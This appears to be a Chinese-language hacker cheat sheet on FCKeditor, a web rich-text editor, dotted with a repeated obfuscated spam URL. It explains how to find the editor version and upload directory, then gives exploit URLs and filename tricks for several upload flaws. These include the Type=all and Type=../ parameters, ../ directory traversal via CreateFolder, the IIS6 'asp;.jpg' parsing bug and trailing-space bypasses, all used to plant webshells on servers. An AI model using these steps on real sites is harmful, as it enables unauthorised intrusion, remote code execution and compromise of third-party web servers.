FCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页
FCKeditor/_samples/default.html查看编辑器版本
FCKeditor/_whatsnew.html
查看文件上传路径
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径
Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6
        [Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言
FCKeditor被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述:
FCKeditor v2.4.3中File类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件
上传后 它保存的文件直接用的¥sFilePath = ¥sServerDir . ¥sFileName,而没有使用¥sExtension为后缀直接导致在win下在上传文件后面加个.来突破[未测试]
而在apache下,因为"Apache文件名解析缺陷漏洞"也可以利用之,详见"附录A"
另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码,其限制最为狭隘。攻击利用:
月末分享 h t
t p
://w w w .y u e m o b a r .c o m
允许其他任何后缀上传
Note:[Hell1]原作:http://superhei.blogbus.com/logs/2006/02/1916091.html
利用2003路径解析漏洞上传网马影响版本: 附录B脆弱描述:
利用2003系统路径解析漏洞的原理,创建类似“bin.asp”如此一般的目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。攻击利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
editor版本FCKeditor PHP上传任意文件漏洞
影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2脆弱描述:
FCKeditor在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。
在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。
成功攻击要求config.php配置文件中启用文件上传,而默认是禁用的。攻击利用: (请修改action字段为指定网址):
FCKeditor 《=2.4.2 for php.html
Note:如想尝试v2.2版漏洞,则修改Type=任意值 即可,但注意,如果换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。
TYPE自定义变量任意上传文件漏洞影响版本: 较早版本脆弱描述:
通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。
月末分享 h t
t p
://w w w .y u e m o b a r .c o m
攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:http://www.heimian.com/UserFiles/all/1.asp
"Type=all" 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.比如输入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp网马就可以传到网站的根目录下.
Note: 如不到默认上传文件夹可检查此文件: 
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor 新闻组件遍历目录漏洞
影响版本:aspx版FCKeditor,其余版本未测试
脆弱描述:如何获得webshell请参考上文“TYPE自定义变量任意上传文件漏洞”攻击利用:
修改CurrentFolder参数使用 ../../来进入不同的目录/browser/default/connectors/aspx/connector.aspx?
Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp根据返回的XML信息可以查看网站所有的目录。/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2FFCKeditor中webshell的其他上传方式影响版本:非优化/精简版本的FCKeditor脆弱描述:
如果存在以下文件,打开后即可上传文件。攻击利用:
fckeditor/editor/filemanager/upload/test.html
月末分享 h t
t p
://w w w .y u e m o b a r .c o m
fckeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor 文件上传“.”变“_”下划线的绕过方法影响版本: FCKeditor => 2.4.x脆弱描述:
我们上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化。攻击利用:
提交1.php+空格 就可以绕过去所有的,
※不过空格只支持win系统 *nix是不支持的[1.php和1.php+空格是2个不同的文件]
Note:upload/2010/3/201003102334372778.jpg 这样的格式做了过滤。也就是IIS6解析漏洞。上传第一次。被过滤为123_asp;123.jpg 从而无法运行。
但是第2次上传同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已经存在。文件名被命名为123.asp;123(1).jpg …… 123.asp;123(2).jpg这样的编号方式。所以。IIS6的漏洞继续执行了。
如果通过上面的步骤进行测试没有成功,可能有以下几方面的原因:
1.FCKeditor没有开启文件上传功能,这项功能在安装FCKeditor时默认是关闭的。如果想上传文件,FCKeditor会给出错误提示。
2.网站采用了精简版的FCKeditor,精简版的FCKeditor很多功能丢失,包括文件上传功能。3.FCKeditor的这个漏洞已经被修复。
月末分享 h t
t p
://w w w .y u e m o b a r .c o m